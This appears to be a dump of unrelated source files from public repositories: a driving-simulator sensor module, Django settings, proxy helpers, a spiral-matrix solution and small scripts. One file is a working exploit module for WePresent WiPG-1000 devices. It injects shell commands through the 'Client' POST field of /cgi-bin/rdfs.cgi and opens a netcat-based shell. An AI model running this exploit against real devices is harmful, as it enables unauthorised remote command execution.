] | null | null | null | sensor.py | vorian77/driving_simulator | 92967eeeaa8cb789725fc89e77af2a80152708c0 | [
"MIT"
] | null | null | null | import obj as obj_lib
import road_artifact
import drive as drive_lib
import utilities as u
class Sensor(obj_lib.Obj):
    """Base class for car sensors.

    collect() returns one of:
        (heading, speed) tuple -- a driving instruction,
        None -- no new process, or the current process has completed,
        'arrived' -- the car has reached its destination.
    """
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen)
        self.classifiers = []
        self.init_classifiers()
    def add_classifier(self, object):
        # Instantiate the classifier class and register the instance.
        instance = object(self.pygame, self.screen)
        self.classifiers.append(instance)
    def init_classifiers(self):
        # Subclass hook: register classifiers here.
        pass
    def collect(self, status):
        """Run every classifier over this tick's raw data; the first one
        that produces a truthy process wins."""
        raw_data = self.retrieve(status)
        evaluations = (c.evaluate(status, raw_data) for c in self.classifiers)
        return next((process for process in evaluations if process), None)
    def retrieve(self, status):
        # Subclass hook: return the raw sensor data for this status.
        pass
    def reset(self):
        for classifier in self.classifiers:
            classifier.reset()
class SensorSimulator(Sensor):
    """Sensor for the simulator: reports road artifacts ahead of the car."""
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen)
    def init_classifiers(self):
        # Registration order matters: collect() returns the process of the
        # first classifier that produces one.
        for classifier_class in (
            ClassiferSimulatorStationaryDestination,
            ClassiferSimulatorStationarySignSpeed15,
            ClassiferSimulatorStationarySignSpeed25,
            ClassiferSimulatorStationarySignSpeed45,
            ClassiferSimulatorStationarySignSpeed55,
            ClassiferSimulatorStationarySignSpeed65,
            ClassiferSimulatorStationarySignStop,
            ClassiferSimulatorStationarySignTrafficLight,
            ClassiferSimulatorMoveVehicle,
            ClassiferSimulatorMovePedestrian,
        ):
            self.add_classifier(classifier_class)
    def retrieve(self, status):
        """Return the road artifacts the car has not yet passed."""
        car = status['car']
        road = status['location']['road']
        reference = car.gnav('midbottom')
        return [
            artifact
            for artifact in road.artifacts
            if road.dir_val_exceeds(artifact.gnav('midtop'), reference)
        ]
class Classifier(obj_lib.Obj):
    """Parent class for sensor classifiers.

    A classifier extracts a feature it knows how to handle from raw
    sensor data, decides whether to activate, and if so returns a
    "process": a (data, process_function) pair that is run each tick
    until the function stops returning instructions.  Per-feature
    lifecycle state lives in self.status keyed by feature id, with
    values 'inactive', 'active' or 'complete'.
    """
    def __init__(self, pygame, screen, activate_distance):
        super().__init__(pygame, screen)
        # Per-feature lifecycle state, keyed by feature id.
        self.status = {}
        # Distance at which a detected feature triggers its process.
        self.activate_distance = activate_distance
        self.activate_distance_buffer = 0
    def evaluate(self, status, raw_data):
        """Return a new process for this tick's raw data, or None."""
        feature = self.extract(status, raw_data)
        if not feature:
            return None
        if not self.activate(status, feature):
            return None
        return self.get_process(status, feature)
    def extract(self, status, raw_data):
        # Subclass hook: if raw_data is handled by this classifier, return
        # structured feature data built from it; otherwise return None.
        pass
    def status_is_inactive(self, id):
        # If the status for the feature with this id has not been set yet,
        # initialize it to 'inactive' (and report True).
        # Otherwise report whether the feature's status is 'inactive'.
        if id not in self.status:
            self.status[id] = 'inactive'
            return True
        else:
            return self.status[id] == 'inactive'
    def status_set_active(self, feature):
        # set the status for feature active
        id = feature['id']
        self.status[id] = 'active'
    def status_set_inactive(self, feature):
        # set the status for feature inactive
        id = feature['id']
        self.status[id] = 'inactive'
    def status_set_complete(self, feature):
        # set the status for feature to complete
        id = feature['id']
        self.status[id] = 'complete'
    def activate(self, status, feature):
        # Subclass hook: return True if the process for this feature
        # should be activated, False otherwise.
        pass
    def get_process(self, status, feature):
        """Mark the feature active and return its (data, function) process."""
        self.status_set_active(feature)
        data = self.get_process_data(status, feature)
        return (data, self.process_function)
    def get_process_data(self, status, feature):
        # Base process payload; subclasses extend this dict.
        return {'status': status, 'feature': feature}
    def process_function(self, data):
        # Subclass hook: per-tick behavior of an active process.
        pass
    def send_instruction(self, car, heading, speed, text):
        """Highlight the car with `text` and return a driving instruction."""
        car.draw_outline(text)
        return car.make_instruction(heading, speed)
    def reset(self):
        # Forget all per-feature state.
        self.status = {}
class ClassifierSimulator(Classifier):
    """Classifier specialized for one road-artifact class in the simulator."""
    def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos):
        super().__init__(pygame, screen, activate_distance)
        self.activate_distance_buffer = 5 # length of car
        # Artifact type this classifier reacts to.
        self.artifact_class = artifact_class
        # gnav position attribute used as the artifact's reference point;
        # None means use the artifact's road-segment position instead.
        self.activate_pos = activate_pos
        self.status = {}
    def get_artifact_id(self, artifact):
        """A feature id unique across roads: (road id, artifact id)."""
        road_id = artifact.road.id
        artifact_id = artifact.id
        return (road_id, artifact_id)
    def extract(self, status, raw_data):
        """Return feature data for the first inactive artifact of our class."""
        for artifact in raw_data:
            if isinstance(artifact, self.artifact_class):
                if self.status_is_inactive(self.get_artifact_id(artifact)):
                    return self.extract_data(status, artifact)
        return None
    def extract_data(self, status, artifact):
        """Build the feature dict: artifact, id, distance, heading, same_lane."""
        feature = {'artifact': artifact, 'id': self.get_artifact_id(artifact)}
        car = status['car']
        road = status['location']['road']
        # distance - difference between artifact position and the car.
        # NOTE(review): the original comment said "bottom of the car" but
        # the code reads car.gnav('top') -- confirm which end is intended.
        if self.activate_pos:
            pos_artifact = artifact.gnav(self.activate_pos)
        else:
            # segment position
            location_road = artifact.pos_parms['length_attribute_road']
            pos_artifact = road.gnav(location_road)
        pos_car = car.gnav('top')
        # graph_dir_length presumably normalizes for road direction -- TODO confirm.
        feature['distance'] = (pos_artifact - pos_car) * road.graph_dir_length
        feature['heading'] = u.heading(car.center, artifact.center)
        # same_lane
        #   * none - artifact is not in a lane
        #   * True - artifact is in the same lane as the car
        #   * False - artifact is in a lane, but not the car's lane
        artifact_lane_id = artifact.pos_width
        if type(artifact_lane_id) is int:
            feature['same_lane'] = artifact_lane_id == status['location']['lane'].lane_id
        else:
            feature['same_lane'] = None
        return feature
    def activate(self, status, feature):
        """Activate when the artifact is not in another lane and is within
        activation distance (plus the car-length buffer)."""
        same_lane = feature['same_lane']
        if same_lane is False:
            return False
        return feature['distance'] <= (self.activate_distance + self.activate_distance_buffer)
    def process_complete(self, feature):
        # Subclass hook: called when the feature's process has finished.
        pass
    def in_collision_buffer(self, car, artifact):
        """True when the car has a collision buffer and the artifact is inside it."""
        return car.collision_buffer and not car.collision_buffer.is_clear([artifact])
class ClassiferSimulatorStationary(ClassifierSimulator):
    """Base classifier for stationary artifacts (signs, destinations).

    A stationary artifact is handled at most once: its feature is marked
    'complete' when the process finishes, so it never re-triggers.
    """
    def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos):
        super().__init__(pygame, screen, artifact_class, activate_distance, activate_pos)
    def process_complete(self, feature):
        self.status_set_complete(feature)
class ClassiferSimulatorStationaryDestination(ClassiferSimulatorStationary):
    """Stops the car at a destination artifact, waits, then reports arrival."""
    WAIT_MS = 3 * 1000  # pause at the destination for 3 seconds
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationaryDestination, 0, None)
    def get_process_data(self, status, feature):
        data = super().get_process_data(status, feature)
        # Record the tick at which the wait ends.
        data['complete'] = self.pygame.time.get_ticks() + self.WAIT_MS
        return data
    def process_function(self, data):
        car = data['status']['car']
        if self.pygame.time.get_ticks() >= data['complete']:
            # Wait is over: signal arrival to the caller.
            return 'arrived'
        return self.send_instruction(car, None, 0, 'Waiting at destination')
class ClassiferSimulatorStationarySignSpeed(ClassiferSimulatorStationary):
    """Base classifier for speed-limit signs: sets the car's speed once.

    `speed` is the posted limit supplied by the concrete subclass.
    """
    def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos, speed):
        # Target speed for this sign type; stored before delegating to the
        # base initializer.
        self.speed = speed
        super().__init__(pygame, screen, artifact_class, activate_distance, activate_pos)
    def process_function(self, data):
        """Issue a speed-change instruction until the car matches, then
        mark the sign handled (implicitly returning None)."""
        car = data['status']['car']
        if car.speed != self.speed:
            car.speed_prev = self.speed # allow temporary speed changes to be reset
            return self.send_instruction(car, None, self.speed, f'Setting speed to: {self.speed}')
        else:
            feature = data['feature']
            self.process_complete(feature)
# Concrete speed-limit classifiers: one per posted-speed sign type, each
# binding its artifact class and target speed.
class ClassiferSimulatorStationarySignSpeed15(ClassiferSimulatorStationarySignSpeed):
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed15, 0, None, 15)
class ClassiferSimulatorStationarySignSpeed25(ClassiferSimulatorStationarySignSpeed):
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed25, 0, None, 25)
class ClassiferSimulatorStationarySignSpeed45(ClassiferSimulatorStationarySignSpeed):
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed45, 0, None, 45)
class ClassiferSimulatorStationarySignSpeed55(ClassiferSimulatorStationarySignSpeed):
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed55, 0, None, 55)
class ClassiferSimulatorStationarySignSpeed65(ClassiferSimulatorStationarySignSpeed):
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignSpeed65, 0, None, 65)
class ClassiferSimulatorStationarySignStop(ClassiferSimulatorStationary):
    """Halts the car at a stop sign for a fixed pause, then resumes speed."""
    WAIT_MS = 3 * 1000  # full stop for 3 seconds
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignStop, 0, None)
    def get_process_data(self, status, feature):
        data = super().get_process_data(status, feature)
        # Record the tick at which the stop ends.
        data['complete'] = self.pygame.time.get_ticks() + self.WAIT_MS
        return data
    def process_function(self, data):
        car = data['status']['car']
        still_waiting = self.pygame.time.get_ticks() < data['complete']
        if still_waiting:
            return self.send_instruction(car, None, 0, 'Waiting at stop sign')
        # Wait is over: resume the previous speed and retire this sign.
        car.restore_speed()
        self.process_complete(data['feature'])
class ClassiferSimulatorStationarySignTrafficLight(ClassiferSimulatorStationary):
    """Holds the car at a red traffic light until it turns green."""
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactStationarySignTrafficLight, 0, None)
    def process_function(self, data):
        feature = data['feature']
        car = data['status']['car']
        light = feature['artifact']
        if light.red:
            # Stay stopped while the light is red.
            return self.send_instruction(car, None, 0, 'Waiting at red traffic light')
        # Green: resume the previous speed and mark this light handled.
        car.restore_speed()
        self.process_complete(feature)
class ClassifierSimulatorMove(ClassifierSimulator):
    """Base classifier for moving artifacts (vehicles, pedestrians).

    Unlike stationary artifacts, a moving artifact's feature returns to
    'inactive' when its process finishes, so the same artifact can
    trigger a new process again later.
    """
    def __init__(self, pygame, screen, artifact_class, activate_distance, activate_pos):
        super().__init__(pygame, screen, artifact_class, activate_distance, activate_pos)
    def process_complete(self, feature):
        # Fix: this class overrides status_set_inactive() to take the
        # process-data dict, so the original self.status_set_inactive(feature)
        # raised KeyError('feature').  Call the base, feature-keyed
        # implementation directly instead.
        super().status_set_inactive(feature)
    def status_set_inactive(self, data):
        # NOTE(review): signature differs from the parent's -- it takes the
        # process-data dict (subclasses pass `data`), not a feature.
        feature = data['feature']
        return super().status_set_inactive(feature)
class ClassiferSimulatorMoveVehicle(ClassifierSimulator):
    """Reacts to a slower vehicle ahead: on a single-lane road the car
    matches the vehicle's speed; on a multi-lane road it changes lane."""
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactMoveVehicle, 50, 'bottom')
    def get_process_data(self, status, feature):
        """Choose the strategy ('single_lane' vs 'multiple_lane') and
        prepare the state each strategy needs."""
        data = super().get_process_data(status, feature)
        car = data['status']['car']
        road = data['status']['location']['road']
        artifact = feature['artifact']
        if road.lane_cnt == 1:
            # only 1 lane - match speed of car
            data['type'] = 'single_lane'
            # Last observed position of the vehicle; used to derive its
            # speed on subsequent ticks.
            data['artifact_pos'] = artifact.gnav('bottom')
        else:
            # select adjoining lane
            data['type'] = 'multiple_lane'
            car.set_collision_buffer_parms('top-front')
            lane_id_current = status['location']['lane'].lane_id
            # Prefer the lane to the left (lower id) when one exists.
            if lane_id_current - 1 >= 0:
                lane_id_new = lane_id_current - 1
            else:
                lane_id_new = lane_id_current + 1
            # create drive guide
            data['drive'] = drive_lib.DriveArcChangeLane(self.pygame, self.screen, car, road, lane_id_current, lane_id_new)
        return data
    def process_function(self, data):
        """Per-tick handler dispatching to the chosen strategy."""
        def change_lane(data):
            # Follow the lane-change arc until the drive guide reports no
            # further heading, then deactivate the process (returns None).
            car = data['status']['car']
            drive = data['drive']
            target_heading = drive.get_heading(car)
            if target_heading is not None:
                return self.send_instruction(car, target_heading, car.speed_prev, f'Changing lane to avoid slow moving vehicle')
            else:
                return self.status_set_inactive(data)
        def slow_down(data):
            # Match the slow vehicle's speed while it is within the
            # activation distance; otherwise resume speed and deactivate.
            car = data['status']['car']
            feature = data['feature']
            artifact = feature['artifact']
            distance = abs(artifact.gnav('bottom') - car.gnav('top'))
            if self.activate_distance > distance:
                pos_prev = data['artifact_pos']
                pos_current = artifact.gnav('bottom')
                speed = (pos_current - pos_prev) # speed is distance per clock cycle
                data['artifact_pos'] = pos_current
                return self.send_instruction(car, artifact.heading, speed, 'Reducing speed for slow vehicle')
            else:
                car.restore_speed()
                return self.status_set_inactive(data)
        ## process_function()
        if data['type'] == 'single_lane':
            return slow_down(data)
        else:
            return change_lane(data)
class ClassiferSimulatorMovePedestrian(ClassifierSimulatorMove):
    """Stops the car while a pedestrian is inside its collision buffer."""
    def __init__(self, pygame, screen):
        super().__init__(pygame, screen, road_artifact.ObjRoadArtifactMovePedestrian, 18, 'bottom')
    def activate(self, status, feature):
        # Require both the base distance/lane check and an actual
        # collision-buffer overlap with the pedestrian.
        base_ok = super().activate(status, feature)
        return base_ok and self.in_collision_buffer(status['car'], feature['artifact'])
    def process_function(self, data):
        car = data['status']['car']
        walker = data['feature']['artifact']
        if not self.in_collision_buffer(car, walker):
            # Path is clear again: resume speed and deactivate the process.
            car.restore_speed()
            return super().status_set_inactive(data)
        car.draw_collision_buffer()
        return self.send_instruction(car, None, 0, 'Waiting for pedestrian')
| 37.363184 | 126 | 0.661119 | 14,881 | 0.990746 | 0 | 0 | 0 | 0 | 0 | 0 | 2,143 | 0.142676 |
2bf0f58a9e0436a17cd88f0338193b8408ef7d76 | 1,826 | py | Python | maza/modules/exploits/misc/wepresent/wipg1000_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | 2 | 2020-02-06T20:24:31.000Z | 2022-03-08T19:07:16.000Z | maza/modules/exploits/misc/wepresent/wipg1000_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | maza/modules/exploits/misc/wepresent/wipg1000_rce.py | ArturSpirin/maza | 56ae6325c08bcedd22c57b9fe11b58f1b38314ca | [
"MIT"
] | null | null | null | from maza.core.exploit import *
from maza.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
    """WePresent WiPG-1000 blind command injection via the rdfs.cgi 'Client' parameter."""

    __info__ = {
        "name": "WePresent WiPG-1000 RCE",
        "description": (
            "Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows "
            "executing commands on operating system level."
        ),
        "authors": (
            "Matthias Brun",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.redguard.ch/advisories/wepresent-wipg1000.txt",
        ),
        "devices": (
            "WePresent WiPG-1000 <=2.0.0.7",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        """Verify the target is vulnerable, then hand control to an interactive shell."""
        if not self.check():
            print_error("Exploit failed - exploit seems to be not vulnerable")
            return
        print_success("Target seems to be vulnerable")
        print_status("This is blind command injection, response is not available")
        shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh")

    def execute(self, cmd):
        """Inject *cmd* through the vulnerable POST parameter.

        The injection is blind, so an empty string is always returned.
        """
        injected = ";{};".format(cmd)
        self.http_request(
            method="POST",
            path="/cgi-bin/rdfs.cgi",
            data={"Client": injected, "Download": "Download"},
        )
        return ""

    @mute
    def check(self):
        """Return True when the vulnerable CGI endpoint's fingerprint is present."""
        fingerprint = "Follow administrator instructions to enter the complete path"
        response = self.http_request(method="GET", path="/cgi-bin/rdfs.cgi")
        return response is not None and fingerprint in response.text
| 30.433333 | 116 | 0.569003 | 1,741 | 0.95345 | 0 | 0 | 350 | 0.191676 | 0 | 0 | 802 | 0.439211 |
2bf2011196393733885cd4b7e26234b68e030539 | 212 | py | Python | solidity/install_solc.py | pdos-team/pdos | 7c96e36b4545d103cc56176197ec590fe2691344 | [
"MIT"
] | null | null | null | solidity/install_solc.py | pdos-team/pdos | 7c96e36b4545d103cc56176197ec590fe2691344 | [
"MIT"
] | null | null | null | solidity/install_solc.py | pdos-team/pdos | 7c96e36b4545d103cc56176197ec590fe2691344 | [
"MIT"
] | 1 | 2020-03-15T14:31:13.000Z | 2020-03-15T14:31:13.000Z | #!/usr/bin/env python3
import os
import sys
# The script insists on running as root (see the message below) — presumably
# because the solc compiler is installed into a system-wide location.
if os.getuid() != 0:
    print ("Must be run as root, sorry.")
    sys.exit(-1)
# Third-party import deferred until after the privilege check — presumably so
# non-root users see the friendly message first (TODO confirm intent).
from solcx import install_solc_pragma
# Install a solc compiler release satisfying this pragma version range.
install_solc_pragma('>0.5.0 <0.6.0')
print ("Done.")
| 16.307692 | 38 | 0.683962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 73 | 0.34434 |
2bf2e3db2a5c23652d59aea6af613c4b44bec6ab | 948 | py | Python | Medium/54_spiralOrder.py | a-shah8/LeetCode | a654e478f51b2254f7b49055beba6b5675bc5223 | [
"MIT"
] | 1 | 2021-06-02T15:03:41.000Z | 2021-06-02T15:03:41.000Z | Medium/54_spiralOrder.py | a-shah8/LeetCode | a654e478f51b2254f7b49055beba6b5675bc5223 | [
"MIT"
] | null | null | null | Medium/54_spiralOrder.py | a-shah8/LeetCode | a654e478f51b2254f7b49055beba6b5675bc5223 | [
"MIT"
] | null | null | null | class Solution:
def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
    """Return all elements of *matrix* in clockwise spiral order.

    Walks the current perimeter (top row -> right column -> bottom row ->
    left column), then shrinks all four boundaries inward and repeats until
    every cell has been emitted.

    :param matrix: rectangular grid of ints (may be empty)
    :return: flat list of the elements in spiral order
    """
    # Robustness fix: the original raised IndexError on an empty matrix
    # (len(matrix[0]) with no rows). An empty grid simply has no elements.
    if not matrix or not matrix[0]:
        return []
    result = []
    rows, columns = len(matrix), len(matrix[0])
    up = left = 0
    right = columns - 1
    down = rows - 1
    while len(result) < rows * columns:
        # Top edge: left -> right.
        for col in range(left, right + 1):
            result.append(matrix[up][col])
        # Right edge: top -> bottom, skipping the corner already emitted.
        for row in range(up + 1, down + 1):
            result.append(matrix[row][right])
        # Bottom edge: right -> left, only when it is a distinct row.
        if up != down:
            for col in range(right - 1, left - 1, -1):
                result.append(matrix[down][col])
        # Left edge: bottom -> top, only when it is a distinct column.
        if left != right:
            for row in range(down - 1, up, -1):
                result.append(matrix[row][left])
        # Shrink the perimeter inward for the next pass.
        up += 1
        down -= 1
        left += 1
        right -= 1
    return result
| 29.625 | 64 | 0.405063 | 947 | 0.998945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
2bf4bb3ef6684d55383ad1bf64b5a2a2127ffa99 | 1,028 | py | Python | SmoothAPI/proxy_handlers.py | technerium/SmoothAPI | 837fda1fd42f81138dad2484a91f51afe9b36f2f | [
"MIT"
] | null | null | null | SmoothAPI/proxy_handlers.py | technerium/SmoothAPI | 837fda1fd42f81138dad2484a91f51afe9b36f2f | [
"MIT"
] | null | null | null | SmoothAPI/proxy_handlers.py | technerium/SmoothAPI | 837fda1fd42f81138dad2484a91f51afe9b36f2f | [
"MIT"
] | null | null | null | class NoProxy:
def get(self, _):
    """Always return None — this handler never supplies a proxy mapping.

    The single ignored argument mirrors RateLimitProxy.get's signature so
    callers can use either handler interchangeably.
    """
    return None
def ban_proxy(self, proxies):
    """No-op: there are no proxies to ban. Returns None like RateLimitProxy.ban_proxy."""
    return None
class RateLimitProxy:
    """Round-robin proxy rotation with a per-path request budget.

    Each path in *paths* maps to a request limit; every ``limit`` requests
    made against a path advance that path's rotation to the next proxy in
    *proxies*. Paths not listed fall back to *default*.
    """

    def __init__(self, proxies, paths, default=None):
        """
        :param proxies: list of proxy URLs to rotate through
        :param paths: mapping path -> number of requests one proxy serves
            for that path before rotating to the next proxy
        :param default: proxy URL for paths absent from *paths*
            (None means "use no proxy")
        """
        self.proxies = proxies
        self.proxy_count = len(proxies)
        # Per-path rotation state: the running request count and the limit.
        self.access_counter = {
            path: {"limit": limit, "count": 0} for path, limit in paths.items()
        }
        self.default = {"http": default, "https": default}

    def get(self, keyword_arguments):
        """Return a requests-style proxy dict for ``keyword_arguments["path"]``."""
        counter = self.access_counter.get(keyword_arguments["path"])
        if counter is None:
            return self.default
        # count // limit selects the rotation slot; the "- proxy_count"
        # offset is cancelled by the modulo and keeps the index in range.
        proxy = self.proxies[
            (counter["count"] // counter["limit"] - self.proxy_count)
            % self.proxy_count
        ]
        counter["count"] += 1
        return {"http": proxy, "https": proxy}

    def ban_proxy(self, proxies):
        """Remove the proxy named by *proxies*' http/https entries from the rotation."""
        banned = {proxies.get("http", ''), proxies.get("https", '')}
        self.proxies = [p for p in self.proxies if p not in banned]
        # BUG FIX: keep proxy_count in sync with the shrunken list. The
        # original left it stale, so get() could compute an index past the
        # end of self.proxies after a ban (IndexError).
        self.proxy_count = len(self.proxies)
        return None
| 31.151515 | 121 | 0.570039 | 1,024 | 0.996109 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.081712 |
2bf4eed1a2461a7de84607671464c884ba1a974c | 3,301 | py | Python | backend/backend/settings/base.py | rrhg/react-django-docker-boilerplate | 760237e7503c25740a77eacb6249d538ea9ad0b0 | [
"MIT"
] | null | null | null | backend/backend/settings/base.py | rrhg/react-django-docker-boilerplate | 760237e7503c25740a77eacb6249d538ea9ad0b0 | [
"MIT"
] | null | null | null | backend/backend/settings/base.py | rrhg/react-django-docker-boilerplate | 760237e7503c25740a77eacb6249d538ea9ad0b0 | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
import os
"""
Django settings for backend project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent.parent
# One level above the Django project directory — presumably the repository
# root of the boilerplate; it is not referenced elsewhere in this module
# (TODO confirm intended use).
BOILERPLATE_DIR = BASE_DIR.parent
# NOTE(review): SECRET_KEY, DEBUG and ALLOWED_HOSTS are not defined in this
# base module — presumably supplied by the environment-specific settings
# files that build upon it; confirm before deploying.
# Apps used in both development & production
INSTALLED_APPS = [
    'polls.apps.PollsConfig',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'corsheaders',      # django-cors-headers (CorsMiddleware below)
    'rest_framework',   # Django REST Framework
]
# Middleware used in both development & production
MIDDLEWARE = [
    # CorsMiddleware is placed first; django-cors-headers requires it above
    # any middleware that can generate responses — confirm against its docs.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'backend.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'backend.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# Connection parameters are read from POSTGRES_* environment variables —
# presumably injected by the container setup (confirm); the port is fixed.
DATABASES = {
    "default": {
        "ENGINE": "django.db.backends.postgresql",
        "NAME": os.environ.get("POSTGRES_DB"),
        "USER": os.environ.get("POSTGRES_USER"),
        "PASSWORD": os.environ.get("POSTGRES_PASSWORD"),
        "HOST": os.environ.get("POSTGRES_HOST"),
        "PORT": 5432,
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
# static files (django admin & rest_framework) will be copied here by collectstatic
# NOTE(review): relative path — resolved against the process working
# directory, not BASE_DIR; confirm this is intentional for the deployment.
STATIC_ROOT = './django-static/'
| 24.819549 | 91 | 0.688882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,349 | 0.711603 |
2bf566fec30c9deeff3c69426f515c5625a28010 | 1,661 | py | Python | scripts/run-and-rename.py | mfs6174/Deep6174 | 92e2ceb48134e0cf003f130aef8d838a7a16c27d | [
"Apache-2.0"
] | null | null | null | scripts/run-and-rename.py | mfs6174/Deep6174 | 92e2ceb48134e0cf003f130aef8d838a7a16c27d | [
"Apache-2.0"
] | null | null | null | scripts/run-and-rename.py | mfs6174/Deep6174 | 92e2ceb48134e0cf003f130aef8d838a7a16c27d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# -*- coding: UTF-8 -*-
# File: run-and-rename.py
# Date: Thu Sep 18 15:43:36 2014 -0700
# Author: Yuxin Wu <ppwwyyxxc@gmail.com>
import numpy as np
from scipy.misc import imread, imsave
from itertools import izip
import sys, os
import shutil
import os.path
import glob
# Expect exactly two arguments: an image directory and a trained model file.
if len(sys.argv) != 3:
    print "Usage: {0} <input directory with images> <model>".format(sys.argv[0])
    sys.exit(0)
# Make the repository root importable so the project modules below resolve.
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../')))
from network_runner import NetworkRunner, get_nn
from lib.imageutil import get_image_matrix
from dataio import read_data
from lib.progress import Progressor
input_dir = sys.argv[1]
# Predicted results are written as renamed copies under <input_dir>/predicted.
output_dir = os.path.join(input_dir, 'predicted')
shutil.rmtree(output_dir, ignore_errors=True)  # start from a clean output directory
os.mkdir(output_dir)
print "Reading images from {0}".format(input_dir)
print "Writing predicted results to {0}".format(output_dir)
model_file = sys.argv[2]
nn = get_nn(model_file)  # load the trained network from the model file
print "Running network with model {0}".format(model_file)
# Run the network against a directory of images,
# and put predicted label in the filename
tot, corr = 0, 0  # tot: images processed; corr: predictions matching the label
for f in glob.glob(input_dir + '/*'):
    if not os.path.isfile(f):
        continue
    # Pixel values are scaled from [0, 255] to [0, 1] before prediction.
    img = imread(f) / 255.0
    pred = nn.predict(img)
    # Ground-truth label is taken from the filename: ...-<label>.<ext>
    label = f.split('-')[-1].split('.')[0]
    # pred[0] appears to be a predicted digit count and pred[1:] the digits,
    # given the pred[1:1+pred[0]] comparison below — TODO confirm.
    new_fname = "{:04d}:{}-{},{}.png".format(tot, label, pred[0],
        ''.join(map(str, pred[1:])))
    imsave(os.path.join(output_dir, new_fname), img)
    tot += 1
    # Count as correct when the first pred[0] predicted digits match the label.
    corr += label == ''.join(map(str, pred[1:1+pred[0]]))
    if tot > 0 and tot % 1000 == 0:
        print "Progress:", tot
print corr, tot
| 27.229508 | 84 | 0.665262 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 440 | 0.264901 |
2bf76e6c71e2e4b130aa3da1d86af45c54dbc8eb | 261 | py | Python | Exercises/Exercise 15 - Hard.py | MikelShifrin/Python1 | 0096a327023a28e0c639042ae01268b07e61943e | [
"MIT"
] | 3 | 2019-07-02T13:46:23.000Z | 2019-08-19T14:41:25.000Z | Exercises/Exercise 15 - Hard.py | MikelShifrin/Python1 | 0096a327023a28e0c639042ae01268b07e61943e | [
"MIT"
] | null | null | null | Exercises/Exercise 15 - Hard.py | MikelShifrin/Python1 | 0096a327023a28e0c639042ae01268b07e61943e | [
"MIT"
] | null | null | null | #Assignment 12
#create 2 files on Desktop:
#input.txt
#output.txt
#inside input.txt write the following lines:
#apple
#orange
#banana
#cucumber
#Your program will read each line, append an 's' to it (e.g. apple -> apples),
#and write the pluralized lines to output.txt
#Hint: name = 'hello\n'
# name.rstrip('\n') | 20.076923 | 44 | 0.720307 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 249 | 0.954023 |
